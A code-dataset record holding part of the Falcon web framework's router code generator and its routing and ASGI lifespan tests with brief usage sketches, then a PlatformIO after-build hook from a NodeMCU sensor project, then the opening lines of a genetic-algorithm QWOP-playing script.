'{0}match = patterns[{1}].match(path[{2}]) # {3}'.format(
_TAB_STR * indentation,
self._pattern_idx,
self._segment_idx,
self._pattern_text,
),
'{0}if match is not None:'.format(_TAB_STR * indentation),
self._children_src(indentation + 1),
]
return '\n'.join(lines)
class _CxIfConverterField(_CxParent):
def __init__(self, field_name, converter_idx):
super(_CxIfConverterField, self).__init__()
self._field_name = field_name
self._converter_idx = converter_idx
def src(self, indentation):
lines = [
'{0}field_value = converters[{1}].convert(fragment)'.format(
_TAB_STR * indentation,
self._converter_idx,
),
'{0}if field_value is not None:'.format(_TAB_STR * indentation),
"{0}params['{1}'] = field_value".format(
_TAB_STR * (indentation + 1),
self._field_name,
),
self._children_src(indentation + 1),
]
return '\n'.join(lines)
class _CxSetFragmentFromField:
def __init__(self, field_name):
self._field_name = field_name
def src(self, indentation):
return "{0}fragment = groups.pop('{1}')".format(
_TAB_STR * indentation,
self._field_name,
)
class _CxSetFragmentFromPath:
def __init__(self, segment_idx):
self._segment_idx = segment_idx
def src(self, indentation):
return '{0}fragment = path[{1}]'.format(
_TAB_STR * indentation,
self._segment_idx,
)
class _CxSetParamsFromPatternMatch:
def src(self, indentation):
return '{0}params.update(match.groupdict())'.format(
_TAB_STR * indentation
)
class _CxSetParamsFromPatternMatchPrefetched:
def src(self, indentation):
return '{0}params.update(groups)'.format(
_TAB_STR * indentation
)
class _CxPrefetchGroupsFromPatternMatch:
def src(self, indentation):
return '{0}groups = match.groupdict()'.format(
_TAB_STR * indentation
)
class _CxReturnNone:
def src(self, indentation):
return '{0}return None'.format(_TAB_STR * indentation)
class _CxReturnValue:
def __init__(self, value_idx):
self._value_idx = value_idx
def src(self, indentation):
return '{0}return return_values[{1}]'.format(
_TAB_STR * indentation,
self._value_idx
)
class _CxSetParam:
def __init__(self, param_name, segment_idx):
self._param_name = param_name
self._segment_idx = segment_idx
def src(self, indentation):
return "{0}params['{1}'] = path[{2}]".format(
_TAB_STR * indentation,
self._param_name,
self._segment_idx,
)
```
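The routing code above is normally driven through `falcon.App.add_route()`, but the router can also be exercised directly. The sketch below is not part of the source file above; it is a minimal illustration, assuming Falcon 3.x and the `DefaultRouter` alias used in the test modules further down, of the documented `suffix` keyword and of the 4-tuple returned by `find()`.
```python
# Hypothetical usage sketch; the resource and route names are invented for illustration.
from falcon.routing import DefaultRouter


class ItemsResource:
    def on_get(self, req, resp):                 # matched via '/items'
        resp.media = ['a', 'b']

    def on_get_item(self, req, resp, item_id):   # matched via suffix='item'
        resp.media = {'id': item_id}


router = DefaultRouter()
router.add_route('/items', ItemsResource())
router.add_route('/items/{item_id:int}', ItemsResource(), suffix='item')

route = router.find('/items/42')
if route is not None:
    resource, method_map, params, uri_template = route
    print(params)        # {'item_id': 42} -- the int converter already coerced the value
    print(uri_template)  # '/items/{item_id:int}'
```
On a miss, `find()` returns `None`, which is exactly what the "fast return" branches emitted by `_generate_ast()` produce.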
#### File: tests/asgi/test_lifespan_handlers.py
```python
import pytest
import falcon
from falcon import testing
from falcon.asgi import App
def test_at_least_one_event_method_required():
class Foo:
pass
app = App()
with pytest.raises(TypeError):
app.add_middleware(Foo())
def test_startup_only():
class Foo:
async def process_startup(self, scope, event):
self._called = True
foo = Foo()
app = App()
app.add_middleware(foo)
client = testing.TestClient(app)
client.simulate_get()
assert foo._called
def test_startup_raises():
class Foo:
def __init__(self):
self._shutdown_called = False
async def process_startup(self, scope, event):
raise Exception('testing 123')
async def process_shutdown(self, scope, event):
self._shutdown_called = True
class Bar:
def __init__(self):
self._startup_called = False
self._shutdown_called = False
async def process_startup(self, scope, event):
self._startup_called = True
async def process_shutdown(self, scope, event):
self._shutdown_called = True
foo = Foo()
bar = Bar()
app = App()
app.add_middleware([foo, bar])
client = testing.TestClient(app)
with pytest.raises(RuntimeError) as excinfo:
client.simulate_get()
message = str(excinfo.value)
assert message.startswith('ASGI app returned lifespan.startup.failed.')
assert 'testing 123' in message
assert not foo._shutdown_called
assert not bar._startup_called
assert not bar._shutdown_called
def test_shutdown_raises():
class HandlerA:
def __init__(self):
self._startup_called = False
async def process_startup(self, scope, event):
self._startup_called = True
async def process_shutdown(self, scope, event):
raise Exception('testing 321')
class HandlerB:
def __init__(self):
self._startup_called = False
self._shutdown_called = False
async def process_startup(self, scope, event):
self._startup_called = True
async def process_shutdown(self, scope, event):
self._shutdown_called = True
a = HandlerA()
b1 = HandlerB()
b2 = HandlerB()
app = App()
app.add_middleware(b1)
app.add_middleware([a, b2])
client = testing.TestClient(app)
with pytest.raises(RuntimeError) as excinfo:
client.simulate_get()
message = str(excinfo.value)
assert message.startswith('ASGI app returned lifespan.shutdown.failed.')
assert 'testing 321' in message
assert a._startup_called
assert b1._startup_called
assert not b1._shutdown_called
assert b2._startup_called
assert b2._shutdown_called
def test_shutdown_only():
class Foo:
async def process_shutdown(self, scope, event):
self._called = True
foo = Foo()
app = App()
app.add_middleware(foo)
client = testing.TestClient(app)
client.simulate_get()
assert foo._called
def test_multiple_handlers():
counter = 0
class HandlerA:
async def process_startup(self, scope, event):
nonlocal counter
self._called_startup = counter
counter += 1
class HandlerB:
async def process_startup(self, scope, event):
nonlocal counter
self._called_startup = counter
counter += 1
async def process_shutdown(self, scope, event):
nonlocal counter
self._called_shutdown = counter
counter += 1
class HandlerC:
async def process_shutdown(self, scope, event):
nonlocal counter
self._called_shutdown = counter
counter += 1
class HandlerD:
async def process_startup(self, scope, event):
nonlocal counter
self._called_startup = counter
counter += 1
class HandlerE:
async def process_startup(self, scope, event):
nonlocal counter
self._called_startup = counter
counter += 1
async def process_shutdown(self, scope, event):
nonlocal counter
self._called_shutdown = counter
counter += 1
async def process_request(self, req, resp):
self._called_request = True
app = App()
a = HandlerA()
b = HandlerB()
c = HandlerC()
d = HandlerD()
e = HandlerE()
app.add_middleware([a, b, c, d, e])
client = testing.TestClient(app)
client.simulate_get()
assert a._called_startup == 0
assert b._called_startup == 1
assert d._called_startup == 2
assert e._called_startup == 3
assert e._called_shutdown == 4
assert c._called_shutdown == 5
assert b._called_shutdown == 6
assert e._called_request
def test_asgi_conductor_raised_error_skips_shutdown():
class SomeException(Exception):
pass
class Foo:
def __init__(self):
self.called_startup = False
self.called_shutdown = False
async def process_startup(self, scope, event):
self.called_startup = True
async def process_shutdown(self, scope, event):
self.called_shutdown = True
foo = Foo()
app = App()
app.add_middleware(foo)
async def t():
with pytest.raises(SomeException):
async with testing.ASGIConductor(app):
raise SomeException()
falcon.invoke_coroutine_sync(t)
assert foo.called_startup
assert not foo.called_shutdown
```
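The tests above drive lifespan middleware through `testing.TestClient`. As a hypothetical, self-contained sketch (not one of the test cases above), a middleware object that sets up state on ASGI startup and tears it down on shutdown looks roughly like this:
```python
# Hypothetical sketch: lifespan middleware on falcon.asgi.App, driven by TestClient.
from falcon import testing
from falcon.asgi import App


class DatabaseLifespan:
    def __init__(self):
        self.started = False
        self.stopped = False

    async def process_startup(self, scope, event):
        self.started = True    # e.g., create a connection pool here

    async def process_shutdown(self, scope, event):
        self.stopped = True    # e.g., dispose of the pool here


mw = DatabaseLifespan()
app = App()
app.add_middleware(mw)

client = testing.TestClient(app)
client.simulate_get()          # TestClient wraps the request in a full lifespan cycle

assert mw.started and mw.stopped
```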
#### File: falcon/tests/test_custom_router.py
```python
import pytest
import falcon
from falcon import testing
from _util import create_app # NOQA
@pytest.mark.parametrize('asgi', [True, False])
def test_custom_router_add_route_should_be_used(asgi):
check = []
class CustomRouter:
def add_route(self, uri_template, *args, **kwargs):
check.append(uri_template)
def find(self, uri):
pass
app = create_app(asgi=asgi, router=CustomRouter())
app.add_route('/test', 'resource')
assert len(check) == 1
assert '/test' in check
@pytest.mark.parametrize('asgi', [True, False])
def test_custom_router_find_should_be_used(asgi):
if asgi:
async def resource(req, resp, **kwargs):
resp.body = '{{"uri_template": "{0}"}}'.format(req.uri_template)
else:
def resource(req, resp, **kwargs):
resp.body = '{{"uri_template": "{0}"}}'.format(req.uri_template)
class CustomRouter:
def __init__(self):
self.reached_backwards_compat = False
def find(self, uri, req=None):
if uri == '/test/42':
return resource, {'GET': resource}, {}, '/test/{id}'
if uri == '/test/42/no-uri-template':
return resource, {'GET': resource}, {}, None
if uri == '/test/42/uri-template/backwards-compat':
return resource, {'GET': resource}, {}
if uri == '/404/backwards-compat':
self.reached_backwards_compat = True
return (None, None, None)
return None
router = CustomRouter()
app = create_app(asgi=asgi, router=router)
client = testing.TestClient(app)
response = client.simulate_request(path='/test/42')
assert response.content == b'{"uri_template": "/test/{id}"}'
response = client.simulate_request(path='/test/42/no-uri-template')
assert response.content == b'{"uri_template": "None"}'
response = client.simulate_request(path='/test/42/uri-template/backwards-compat')
assert response.content == b'{"uri_template": "None"}'
for uri in ('/404', '/404/backwards-compat'):
response = client.simulate_request(path=uri)
assert response.text == falcon.HTTPNotFound().to_json()
assert response.status == falcon.HTTP_404
assert router.reached_backwards_compat
@pytest.mark.parametrize('asgi', [True, False])
def test_can_pass_additional_params_to_add_route(asgi):
check = []
class CustomRouter:
def add_route(self, uri_template, resource, **kwargs):
name = kwargs['name']
self._index = {name: uri_template}
check.append(name)
def find(self, uri):
pass
app = create_app(asgi=asgi, router=CustomRouter())
app.add_route('/test', 'resource', name='my-url-name')
assert len(check) == 1
assert 'my-url-name' in check
# NOTE(kgriffs): Extra values must be passed as kwargs, since that makes
# it a lot easier for overridden methods to simply ignore options they
# don't care about.
with pytest.raises(TypeError):
app.add_route('/test', 'resource', 'xarg1', 'xarg2')
@pytest.mark.parametrize('asgi', [True, False])
def test_custom_router_takes_req_positional_argument(asgi):
if asgi:
async def responder(req, resp):
resp.body = 'OK'
else:
def responder(req, resp):
resp.body = 'OK'
class CustomRouter:
def find(self, uri, req):
if uri == '/test' and isinstance(req, falcon.Request):
return responder, {'GET': responder}, {}, None
router = CustomRouter()
app = create_app(asgi=asgi, router=router)
client = testing.TestClient(app)
response = client.simulate_request(path='/test')
assert response.content == b'OK'
@pytest.mark.parametrize('asgi', [True, False])
def test_custom_router_takes_req_keyword_argument(asgi):
if asgi:
async def responder(req, resp):
resp.body = 'OK'
else:
def responder(req, resp):
resp.body = 'OK'
class CustomRouter:
def find(self, uri, req=None):
if uri == '/test' and isinstance(req, falcon.Request):
return responder, {'GET': responder}, {}, None
router = CustomRouter()
app = create_app(asgi=asgi, router=router)
client = testing.TestClient(app)
response = client.simulate_request(path='/test')
assert response.content == b'OK'
```
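For reference, here is a hypothetical, minimal custom router wired into an app directly. The class, route, and responder names are invented; the only contract, as the tests above show, is an `add_route()` method plus a `find()` that returns the same 4-tuple as `CompiledRouter.find()`, or `None` on a miss.
```python
# Hypothetical sketch of the custom-router contract exercised by the tests above.
import falcon
from falcon import testing


def status_responder(req, resp):
    resp.media = {'ok': True}


class TinyRouter:
    def __init__(self):
        self._routes = {}

    def add_route(self, uri_template, resource, **kwargs):
        self._routes[uri_template] = resource

    def find(self, uri, req=None):
        if uri == '/status':
            # (resource, method_map, params, uri_template)
            return status_responder, {'GET': status_responder}, {}, '/status'
        return None


app = falcon.App(router=TinyRouter())
client = testing.TestClient(app)
print(client.simulate_get('/status').json)   # {'ok': True}
```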
#### File: falcon/tests/test_default_router.py
```python
import textwrap
import pytest
from falcon import testing
from falcon.routing import DefaultRouter
from _util import create_app # NOQA
def client(asgi):
return testing.TestClient(create_app(asgi))
@pytest.fixture
def router():
router = DefaultRouter()
router.add_route(
'/repos', ResourceWithId(1))
router.add_route(
'/repos/{org}', ResourceWithId(2))
router.add_route(
'/repos/{org}/{repo}', ResourceWithId(3))
router.add_route(
'/repos/{org}/{repo}/commits', ResourceWithId(4))
router.add_route(
'/repos/{org}/{repo}/compare/{usr0}:{branch0}...{usr1}:{branch1}',
ResourceWithId(5))
router.add_route(
'/teams/{id}', ResourceWithId(6))
router.add_route(
'/teams/{id}/members', ResourceWithId(7))
router.add_route(
'/teams/default', ResourceWithId(19))
router.add_route(
'/teams/default/members/thing', ResourceWithId(19))
router.add_route(
'/user/memberships', ResourceWithId(8))
router.add_route(
'/emojis', ResourceWithId(9))
router.add_route(
'/repos/{org}/{repo}/compare/{usr0}:{branch0}...{usr1}:{branch1}/full',
ResourceWithId(10))
router.add_route(
'/repos/{org}/{repo}/compare/all', ResourceWithId(11))
# NOTE(kgriffs): The ordering of these calls is significant; we
# need to test that the {id} field does not match the other routes,
# regardless of the order they are added.
router.add_route(
'/emojis/signs/0', ResourceWithId(12))
router.add_route(
'/emojis/signs/{id}', ResourceWithId(13))
router.add_route(
'/emojis/signs/42', ResourceWithId(14))
router.add_route(
'/emojis/signs/42/small.jpg', ResourceWithId(23))
router.add_route(
'/emojis/signs/78/small.png', ResourceWithId(24))
# Test some more special chars
router.add_route(
'/emojis/signs/78/small(png)', ResourceWithId(25))
router.add_route(
'/emojis/signs/78/small_png', ResourceWithId(26))
router.add_route('/images/{id}.gif', ResourceWithId(27))
router.add_route(
'/repos/{org}/{repo}/compare/{usr0}:{branch0}...{usr1}:{branch1}/part',
ResourceWithId(15))
router.add_route(
'/repos/{org}/{repo}/compare/{usr0}:{branch0}', ResourceWithId(16))
router.add_route(
'/repos/{org}/{repo}/compare/{usr0}:{branch0}/full', ResourceWithId(17))
router.add_route(
'/gists/{id}/{representation}', ResourceWithId(21))
router.add_route(
'/gists/{id}/raw', ResourceWithId(18))
router.add_route(
'/gists/first', ResourceWithId(20))
router.add_route('/item/{q}', ResourceWithId(28))
# ----------------------------------------------------------------
# Routes with field converters
# ----------------------------------------------------------------
router.add_route(
'/cvt/teams/{id:int(min=7)}', ResourceWithId(29))
router.add_route(
'/cvt/teams/{id:int(min=7)}/members', ResourceWithId(30))
router.add_route(
'/cvt/teams/default', ResourceWithId(31))
router.add_route(
'/cvt/teams/default/members/{id:int}-{tenure:int}', ResourceWithId(32))
router.add_route(
'/cvt/repos/{org}/{repo}/compare/{usr0}:{branch0:int}...{usr1}:{branch1:int}/part',
ResourceWithId(33))
router.add_route(
'/cvt/repos/{org}/{repo}/compare/{usr0}:{branch0:int}', ResourceWithId(34))
router.add_route(
'/cvt/repos/{org}/{repo}/compare/{usr0}:{branch0:int}/full', ResourceWithId(35))
return router
class ResourceWithId:
def __init__(self, resource_id):
self.resource_id = resource_id
def __repr__(self):
return 'ResourceWithId({})'.format(self.resource_id)
def on_get(self, req, resp):
resp.body = self.resource_id
class SpamConverter:
def __init__(self, times, eggs=False):
self._times = times
self._eggs = eggs
def convert(self, fragment):
item = fragment
if self._eggs:
item += '&eggs'
return ', '.join(item for i in range(self._times))
# =====================================================================
# Regression tests for use cases reported by users
# =====================================================================
def test_user_regression_versioned_url():
router = DefaultRouter()
router.add_route('/{version}/messages', ResourceWithId(2))
resource, __, __, __ = router.find('/v2/messages')
assert resource.resource_id == 2
router.add_route('/v2', ResourceWithId(1))
resource, __, __, __ = router.find('/v2')
assert resource.resource_id == 1
resource, __, __, __ = router.find('/v2/messages')
assert resource.resource_id == 2
resource, __, __, __ = router.find('/v1/messages')
assert resource.resource_id == 2
route = router.find('/v1')
assert route is None
def test_user_regression_recipes():
router = DefaultRouter()
router.add_route(
'/recipes/{activity}/{type_id}',
ResourceWithId(1)
)
router.add_route(
'/recipes/baking',
ResourceWithId(2)
)
resource, __, __, __ = router.find('/recipes/baking/4242')
assert resource.resource_id == 1
resource, __, __, __ = router.find('/recipes/baking')
assert resource.resource_id == 2
route = router.find('/recipes/grilling')
assert route is None
@pytest.mark.parametrize('uri_template,path,expected_params', [
('/serviceRoot/People|{field}', '/serviceRoot/People|susie', {'field': 'susie'}),
('/serviceRoot/People[{field}]', "/serviceRoot/People['calvin']", {'field': "'calvin'"}),
('/serviceRoot/People({field})', "/serviceRoot/People('hobbes')", {'field': "'hobbes'"}),
('/serviceRoot/People({field})', "/serviceRoot/People('hob)bes')", {'field': "'hob)bes'"}),
('/serviceRoot/People({field})(z)', '/serviceRoot/People(hobbes)(z)', {'field': 'hobbes'}),
("/serviceRoot/People('{field}')", "/serviceRoot/People('rosalyn')", {'field': 'rosalyn'}),
('/^{field}', '/^42', {'field': '42'}),
('/+{field}', '/+42', {'field': '42'}),
(
'/foo/{first}_{second}/bar',
'/foo/abc_def_ghijk/bar',
# NOTE(kgriffs): The regex pattern is greedy, so this is
# expected. We can not change this behavior in a minor
# release, since it would be a breaking change. If there
# is enough demand for it, we could introduce an option
# to toggle this behavior.
{'first': 'abc_def', 'second': 'ghijk'},
),
# NOTE(kgriffs): Why someone would use a question mark like this
# I have no idea (esp. since it would have to be encoded to avoid
# being mistaken for the query string separator). Including it only
# for completeness.
('/items/{x}?{y}', '/items/1080?768', {'x': '1080', 'y': '768'}),
('/items/{x}|{y}', '/items/1080|768', {'x': '1080', 'y': '768'}),
('/items/{x},{y}', '/items/1080,768', {'x': '1080', 'y': '768'}),
('/items/{x}^^{y}', '/items/1080^^768', {'x': '1080', 'y': '768'}),
('/items/{x}*{y}*', '/items/1080*768*', {'x': '1080', 'y': '768'}),
('/thing-2/something+{field}+', '/thing-2/something+42+', {'field': '42'}),
('/thing-2/something*{field}/notes', '/thing-2/something*42/notes', {'field': '42'}),
(
'/thing-2/something+{field}|{q}/notes',
'/thing-2/something+else|z/notes',
{'field': 'else', 'q': 'z'},
),
(
"serviceRoot/$metadata#Airports('{field}')/Name",
"serviceRoot/$metadata#Airports('KSFO')/Name",
{'field': 'KSFO'},
),
])
def test_user_regression_special_chars(uri_template, path, expected_params):
router = DefaultRouter()
router.add_route(uri_template, ResourceWithId(1))
route = router.find(path)
assert route is not None
resource, __, params, __ = route
assert resource.resource_id == 1
assert params == expected_params
# =====================================================================
# Other tests
# =====================================================================
@pytest.mark.parametrize('asgi', [True, False])
@pytest.mark.parametrize('uri_template', [
{},
set(),
object()
])
def test_not_str(asgi, uri_template):
app = create_app(asgi)
with pytest.raises(TypeError):
app.add_route(uri_template, ResourceWithId(-1))
def test_root_path():
router = DefaultRouter()
router.add_route('/', ResourceWithId(42))
resource, __, __, __ = router.find('/')
assert resource.resource_id == 42
expected_src = textwrap.dedent("""
def find(path, return_values, patterns, converters, params):
path_len = len(path)
if path_len > 0:
if path[0] == '':
if path_len == 1:
return return_values[0]
return None
return None
return None
""").strip()
assert router.finder_src == expected_src
@pytest.mark.parametrize('uri_template', [
'/{field}{field}',
'/{field}...{field}',
'/{field}/{another}/{field}',
'/{field}/something/something/{field}/something',
])
def test_duplicate_field_names(uri_template):
router = DefaultRouter()
with pytest.raises(ValueError):
router.add_route(uri_template, ResourceWithId(1))
@pytest.mark.parametrize('uri_template,path', [
('/items/thing', '/items/t'),
('/items/{x}|{y}|', '/items/1080|768'),
('/items/{x}*{y}foo', '/items/1080*768foobar'),
('/items/{x}*768*', '/items/1080*768***'),
])
def test_match_entire_path(uri_template, path):
router = DefaultRouter()
router.add_route(uri_template, ResourceWithId(1))
route = router.find(path)
assert route is None
@pytest.mark.parametrize('uri_template', [
'/teams/{conflict}', # simple vs simple
'/emojis/signs/{id_too}', # another simple vs simple
'/repos/{org}/{repo}/compare/{complex}:{vs}...{complex2}:{conflict}',
'/teams/{id:int}/settings', # converted vs. non-converted
])
def test_conflict(router, uri_template):
with pytest.raises(ValueError):
router.add_route(uri_template, ResourceWithId(-1))
@pytest.mark.parametrize('uri_template', [
'/repos/{org}/{repo}/compare/{simple_vs_complex}',
'/repos/{complex}.{vs}.{simple}',
'/repos/{org}/{repo}/compare/{complex}:{vs}...{complex2}/full',
])
def test_non_conflict(router, uri_template):
router.add_route(uri_template, ResourceWithId(-1))
@pytest.mark.parametrize('uri_template', [
# Missing field name
'/{}',
'/repos/{org}/{repo}/compare/{}',
'/repos/{complex}.{}.{thing}',
# Field names must be valid Python identifiers
'/{9v}',
'/{524hello}/world',
'/hello/{1world}',
'/repos/{complex}.{9v}.{thing}/etc',
'/{*kgriffs}',
'/{@kgriffs}',
'/repos/{complex}.{v}.{@thing}/etc',
'/{-kgriffs}',
'/repos/{complex}.{-v}.{thing}/etc',
'/repos/{simple-thing}/etc',
# Neither fields nor literal segments may contain whitespace
'/this and that',
'/this\tand\tthat',
'/this\nand\nthat',
'/{thing }/world',
'/{thing\t}/world',
'/{\nthing}/world',
'/{th\ving}/world',
'/{ thing}/world',
'/{ thing }/world',
'/{thing}/wo rld',
'/{thing} /world',
'/repos/{or g}/{repo}/compare/{thing}',
'/repos/{org}/{repo}/compare/{th\ting}',
])
def test_invalid_field_name(router, uri_template):
with pytest.raises(ValueError):
router.add_route(uri_template, ResourceWithId(-1))
def test_print_src(router):
"""Diagnostic test that simply prints the router's find() source code.
Example:
$ tox -e py3_debug -- -k test_print_src -s
"""
print('\n\n' + router.finder_src + '\n')
def test_override(router):
router.add_route('/emojis/signs/0', ResourceWithId(-1))
resource, __, __, __ = router.find('/emojis/signs/0')
assert resource.resource_id == -1
def test_literal_segment(router):
resource, __, __, __ = router.find('/emojis/signs/0')
assert resource.resource_id == 12
resource, __, __, __ = router.find('/emojis/signs/1')
assert resource.resource_id == 13
resource, __, __, __ = router.find('/emojis/signs/42')
assert resource.resource_id == 14
resource, __, __, __ = router.find('/emojis/signs/42/small.jpg')
assert resource.resource_id == 23
route = router.find('/emojis/signs/1/small')
assert route is None
@pytest.mark.parametrize('path', [
'/teams',
'/emojis/signs',
'/gists',
'/gists/42',
])
def test_dead_segment(router, path):
route = router.find(path)
assert route is None
@pytest.mark.parametrize('path', [
'/repos/racker/falcon/compare/foo',
'/repos/racker/falcon/compare/foo/full',
])
def test_malformed_pattern(router, path):
route = router.find(path)
assert route is None
def test_literal(router):
resource, __, __, __ = router.find('/user/memberships')
assert resource.resource_id == 8
@pytest.mark.parametrize('path,expected_params', [
('/cvt/teams/007', {'id': 7}),
('/cvt/teams/1234/members', {'id': 1234}),
('/cvt/teams/default/members/700-5', {'id': 700, 'tenure': 5}),
(
'/cvt/repos/org/repo/compare/xkcd:353',
{'org': 'org', 'repo': 'repo', 'usr0': 'xkcd', 'branch0': 353},
),
(
'/cvt/repos/org/repo/compare/gunmachan:1234...kumamon:5678/part',
{
'org': 'org',
'repo': 'repo',
'usr0': 'gunmachan',
'branch0': 1234,
'usr1': 'kumamon',
'branch1': 5678,
}
),
(
'/cvt/repos/xkcd/353/compare/susan:0001/full',
{'org': 'xkcd', 'repo': '353', 'usr0': 'susan', 'branch0': 1},
)
])
def test_converters(router, path, expected_params):
__, __, params, __ = router.find(path)
assert params == expected_params
@pytest.mark.parametrize('uri_template', [
'/foo/{bar:int(0)}',
'/foo/{bar:int(num_digits=0)}',
'/foo/{bar:int(-1)}/baz',
'/foo/{bar:int(num_digits=-1)}/baz',
])
def test_converters_with_invalid_options(router, uri_template):
# NOTE(kgriffs): Sanity-check that errors are properly bubbled up
# when calling add_route(). Additional checks can be found
# in test_uri_converters.py
with pytest.raises(ValueError, match='Cannot instantiate converter') as e:
router.add_route(uri_template, ResourceWithId(1))
assert e.value.__cause__ is not None
@pytest.mark.parametrize('uri_template', [
'/foo/{bar:}',
'/foo/{bar:unknown}/baz',
])
def test_converters_malformed_specification(router, uri_template):
with pytest.raises(ValueError):
router.add_route(uri_template, ResourceWithId(1))
def test_variable(router):
resource, __, params, __ = router.find('/teams/42')
assert resource.resource_id == 6
assert params == {'id': '42'}
__, __, params, __ = router.find('/emojis/signs/stop')
assert params == {'id': 'stop'}
__, __, params, __ = router.find('/gists/42/raw')
assert params == {'id': '42'}
__, __, params, __ = router.find('/images/42.gif')
assert params == {'id': '42'}
def test_single_character_field_name(router):
__, __, params, __ = router.find('/item/1234')
assert params == {'q': '1234'}
@pytest.mark.parametrize('path,expected_id', [
('/teams/default', 19),
('/teams/default/members', 7),
('/cvt/teams/default', 31),
('/cvt/teams/default/members/1234-10', 32),
('/teams/1234', 6),
('/teams/1234/members', 7),
('/gists/first', 20),
('/gists/first/raw', 18),
('/gists/first/pdf', 21),
('/gists/1776/pdf', 21),
('/emojis/signs/78', 13),
('/emojis/signs/78/small.png', 24),
('/emojis/signs/78/small(png)', 25),
('/emojis/signs/78/small_png', 26),
])
def test_literal_vs_variable(router, path, expected_id):
resource, __, __, __ = router.find(path)
assert resource.resource_id == expected_id
@pytest.mark.parametrize('path', [
# Misc.
'/this/does/not/exist',
'/user/bogus',
'/repos/racker/falcon/compare/johndoe:master...janedoe:dev/bogus',
# Literal vs variable (teams)
'/teams',
'/teams/42/members/undefined',
'/teams/42/undefined',
'/teams/42/undefined/segments',
'/teams/default/members/undefined',
'/teams/default/members/thing/undefined',
'/teams/default/members/thing/undefined/segments',
'/teams/default/undefined',
'/teams/default/undefined/segments',
# Literal vs. variable (converters)
'/cvt/teams/default/members', # 'default' can't be converted to an int
'/cvt/teams/NaN',
'/cvt/teams/default/members/NaN',
# Literal vs variable (emojis)
'/emojis/signs',
'/emojis/signs/0/small',
'/emojis/signs/0/undefined',
'/emojis/signs/0/undefined/segments',
'/emojis/signs/20/small',
'/emojis/signs/20/undefined',
'/emojis/signs/42/undefined',
'/emojis/signs/78/undefined',
])
def test_not_found(router, path):
route = router.find(path)
assert route is None
def test_subsegment_not_found(router):
route = router.find('/emojis/signs/0/x')
assert route is None
def test_multivar(router):
resource, __, params, __ = router.find('/repos/racker/falcon/commits')
assert resource.resource_id == 4
assert params == {'org': 'racker', 'repo': 'falcon'}
resource, __, params, __ = router.find('/repos/racker/falcon/compare/all')
assert resource.resource_id == 11
assert params == {'org': 'racker', 'repo': 'falcon'}
@pytest.mark.parametrize('url_postfix,resource_id', [
('', 5),
('/full', 10),
('/part', 15),
])
def test_complex(router, url_postfix, resource_id):
uri = '/repos/racker/falcon/compare/johndoe:master...janedoe:dev'
resource, __, params, __ = router.find(uri + url_postfix)
assert resource.resource_id == resource_id
assert (params == {
'org': 'racker',
'repo': 'falcon',
'usr0': 'johndoe',
'branch0': 'master',
'usr1': 'janedoe',
'branch1': 'dev',
})
@pytest.mark.parametrize('url_postfix,resource_id,expected_template', [
('', 16, '/repos/{org}/{repo}/compare/{usr0}:{branch0}'),
('/full', 17, '/repos/{org}/{repo}/compare/{usr0}:{branch0}/full')
])
def test_complex_alt(router, url_postfix, resource_id, expected_template):
uri = '/repos/falconry/falcon/compare/johndoe:master' + url_postfix
resource, __, params, uri_template = router.find(uri)
assert resource.resource_id == resource_id
assert (params == {
'org': 'falconry',
'repo': 'falcon',
'usr0': 'johndoe',
'branch0': 'master',
})
assert uri_template == expected_template
def test_options_converters_set(router):
router.options.converters['spam'] = SpamConverter
router.add_route('/{food:spam(3, eggs=True)}', ResourceWithId(1))
resource, __, params, __ = router.find('/spam')
assert params == {'food': 'spam&eggs, spam&eggs, spam&eggs'}
@pytest.mark.parametrize('converter_name', [
'spam',
'spam_2'
])
def test_options_converters_update(router, converter_name):
router.options.converters.update({
'spam': SpamConverter,
'spam_2': SpamConverter,
})
template = '/{food:' + converter_name + '(3, eggs=True)}'
router.add_route(template, ResourceWithId(1))
resource, __, params, __ = router.find('/spam')
assert params == {'food': 'spam&eggs, spam&eggs, spam&eggs'}
@pytest.mark.parametrize('name', [
'has whitespace',
'whitespace ',
' whitespace ',
' whitespace',
'funky$character',
'42istheanswer',
'with-hyphen',
])
def test_options_converters_invalid_name(router, name):
with pytest.raises(ValueError):
router.options.converters[name] = object
def test_options_converters_invalid_name_on_update(router):
with pytest.raises(ValueError):
router.options.converters.update({
'valid_name': SpamConverter,
'7eleven': SpamConverter,
})
``` |
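Building on the `SpamConverter` tests above, the following hypothetical end-to-end sketch registers a custom field converter at the app level, following the flow documented in the `CompiledRouterOptions` docstring. The `hex` converter name, resource, and route are invented for illustration.
```python
# Hypothetical sketch: a custom converter registered via app.router_options,
# following the CompiledRouterOptions docstring and the SpamConverter tests above.
import falcon
from falcon import testing


class HexConverter:
    def convert(self, fragment):
        try:
            return int(fragment, 16)
        except ValueError:
            return None   # None means "no match", so the route simply does not match


class ColorResource:
    def on_get(self, req, resp, code):
        resp.media = {'code': code}


app = falcon.App()
app.router_options.converters['hex'] = HexConverter   # register the class, not an instance
app.add_route('/colors/{code:hex}', ColorResource())

client = testing.TestClient(app)
print(client.simulate_get('/colors/ff8800').json)     # {'code': 16746496}
print(client.simulate_get('/colors/nothex').status)   # 404 Not Found
```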
{
"source": "5orenso/nodemcu-mqtt-home-sensors",
"score": 2
} |
#### File: 5orenso/nodemcu-mqtt-home-sensors/add_build_hooks.py
```python
Import("env", "projenv")
my_flags = env.ParseFlags(env['BUILD_FLAGS'])
defines = {k: v for (k, v) in my_flags.get("CPPDEFINES")}
# access to global build environment
# print("GLOBAL ENV")
# print(env)
# access to project build environment (is used source files in "src" folder)
# print("PROJECT ENV")
# print(projenv)
#
# Dump build environment (for debug purpose)
# print(env.Dump())
# print(defines.get("VERSION"));
def after_build(source, target, env):
# print(source[0]);
# print(target[0]);
# print(env["PIOENV"]);
# do some actions
# after_build(["buildprog"], [".pio/build/nodemcuv2_nystuen/firmware.bin"])
version = defines.get("VERSION");
environment = env["PIOENV"];
firmware = str(source[0]);
# print(version);
# print(environment);
# print(firmware);
execute_string = ' '.join(["bash", "./after_build_hook.sh", "--firmware", firmware, "--version", version, "--environment", environment]);
# print(execute_string);
env.Execute(execute_string);
env.AddPostAction("buildprog", after_build)
``` |
{
"source": "5outh/autoqwop",
"score": 2
} |
#### File: autoqwop/src/autoqwopper.py
```python
import ImageGrab
import Image
import os
import time
from random import *
import win32api, win32con
import threading
from pytesser import *
from deap import base
from deap import creator
from deap import tools
import numpy
import math
import pickle
import sys
# Globals
LB_FILE = open('../logbook.pickle', 'w+')
# DEAP stuff
IND_SIZE = 5 #number of key presses
POP_SIZE = 1 #number of individuals
T_SIZE = 3 #tournament size
generations = 1000 #number of generations
selb = 1 #how many individuals to select when you call toolbox.selectBest
selw = 5 #how many individuals to select whe nyou call toolbox.selectWorst
# QWOP stuff
